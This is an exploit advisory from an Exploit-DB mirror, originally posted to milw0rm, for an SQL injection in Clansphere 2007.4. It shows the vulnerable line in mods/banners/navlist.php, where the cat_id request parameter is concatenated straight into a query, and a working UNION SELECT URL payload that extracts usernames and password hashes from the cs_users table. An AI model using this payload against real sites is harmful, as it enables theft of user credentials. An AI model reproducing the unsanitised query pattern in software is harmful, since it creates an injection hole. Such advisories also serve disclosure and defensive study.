exploit-db-mirror/exploits/php/webapps/4443.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

42 lines
No EOL
1.4 KiB
Text

#########################################################################################
#
# Inclusion Hunter Team
# http://www.ihteam.net
#
#
# [Clansphere 2007.4]
#
#
# Class: SQL Injection
# Found: 22/09/2007
# Remote: Yes
# Site: http://www.clansphere.net/
# Download: http://sourceforge.net/project/showfiles.php?group_id=95430
#
#########################################################################################
Vulnerable code:
mods/banners/navlist.php
============================================================================================================
if(!empty($_GET['cat_id'])) {
$where = "categories_id = '" . $_GET['cat_id'] . "'";
============================================================================================================
Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================
http://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu
ll%20FROM%20cs_users/*
===================================================================================================================
Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================
# milw0rm.com [2007-09-22]